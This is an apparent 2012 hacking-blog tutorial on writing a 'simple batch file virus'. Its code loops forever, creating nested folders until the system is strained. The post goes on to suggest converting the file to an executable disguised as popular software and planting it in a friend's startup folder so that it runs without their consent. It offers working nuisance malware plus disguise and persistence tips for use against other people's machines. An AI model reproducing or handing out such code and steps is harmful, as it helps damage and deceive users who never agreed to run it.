HACKERS UNDERGROUND © 2012 BY RISHABH SHARMA

Sunday, 22 January 2012

Folder within a folder… creating a simple batch file virus…

Batch files are the simplest way to create an even simpler virus, that may vary in their effects depending upon the complexity in the code. It might crash your operating system, delete crucial system files or even format you hard drives without user’s consent. Following are the steps to create a simple batch file virus:

1.open the notepad and type the follwing code:
:435
md d
cd d
goto :435

2.Save as with virus.bat on desktop.

3.Your virus is ready,just double click on it to check out what happens.

4.For further advancement in it, download a bat to exe converter,through it change the icon,properties and title of the bat file into any popular software.

5.And now your virus is ready to be executed.
To scare your friends, just put this batch file in the startup folder of his/her pc.


post by rishabh sharma hackersunderground

0 comments:

Post a Comment

 
Design by HACKERS UNDERGROUND
HACKERS UNDERGROUND © 2012 BY RISHABH SHARMA